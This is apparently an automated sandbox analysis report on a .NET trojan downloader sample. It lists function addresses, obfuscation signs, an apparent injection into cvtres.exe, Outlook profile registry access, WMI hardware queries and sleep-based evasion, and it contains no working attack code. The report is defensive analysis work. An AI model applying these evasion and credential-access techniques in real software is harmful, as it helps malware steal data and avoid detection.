                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5040A0_2_00A5040A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A558680_2_00A55868
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A544710_2_00A54471
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A504480_2_00A50448
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A594480_2_00A59448
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A558580_2_00A55858
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5992A0_2_00A5992A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A599380_2_00A59938
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A556880_2_00A55688
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A572010_2_00A57201
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A512710_2_00A51271
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A55E700_2_00A55E70
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A556780_2_00A55678
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A593A40_2_00A593A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A54FA80_2_00A54FA8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A54F980_2_00A54F98
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A593F40_2_00A593F4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A58BF00_2_00A58BF0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A587C90_2_00A587C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A597100_2_00A59710
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A503680_2_00A50368
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B520203_2_00B52020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5CD183_2_00B5CD18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B52D503_2_00B52D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B526183_2_00B52618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5AB703_2_00B5AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5F4203_2_00B5F420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_069647A03_2_069647A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_069647903_2_06964790
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC71203_2_09EC7120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC90D83_2_09EC90D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC68503_2_09EC6850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC65083_2_09EC6508
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000000.230636214.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQIYUIEHDKHDFKDF.exe@ vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245453721.000000000273D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejMwFIuasQmBRssQfxHWfZPad.exe4 vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244435933.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244843547.0000000000BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejMwFIuasQmBRssQfxHWfZPad.exe4 vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244878881.0000000002589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000000.230581294.0000000000202000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeBinary or memory string: OriginalFilenameQIYUIEHDKHDFKDF.exe@ vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: invalid certificate
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: 3.0.cvtres.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.cvtres.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.cvtres.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.cvtres.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.2.cvtres.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.2.cvtres.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\WHGDFHKDLHDJD.pdb source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\WHGDFHKDLHDJD.pdbBSJB source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QIYUIEHDKHDFKDF.pdb source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: Binary string: QIYUIEHDKHDFKDF.pdb$ source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe

                Data Obfuscation

                barindex
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, u202b????????????????????????????????????????.cs.Net Code: ???????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.200000.0.unpack, u202b????????????????????????????????????????.cs.Net Code: ???????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A561EB push ecx; iretd 0_2_00A561EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B57A37 push edi; retn 0000h3_2_00B57A39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06968F69 push ebx; retf 3_2_06968F76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06966B1F push ebx; retf 3_2_06966B3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_069669B5 push ebp; retf 3_2_069669DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06967E40 push edx; retf 3_2_06967E4E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06967961 push es; ret 3_2_06967970
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: real checksum: 0x4685f should be: 0x4a718
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe TID: 2912Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe TID: 6080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 5752Thread sleep time: -18446744073709540s >= -30000sJump to behavior
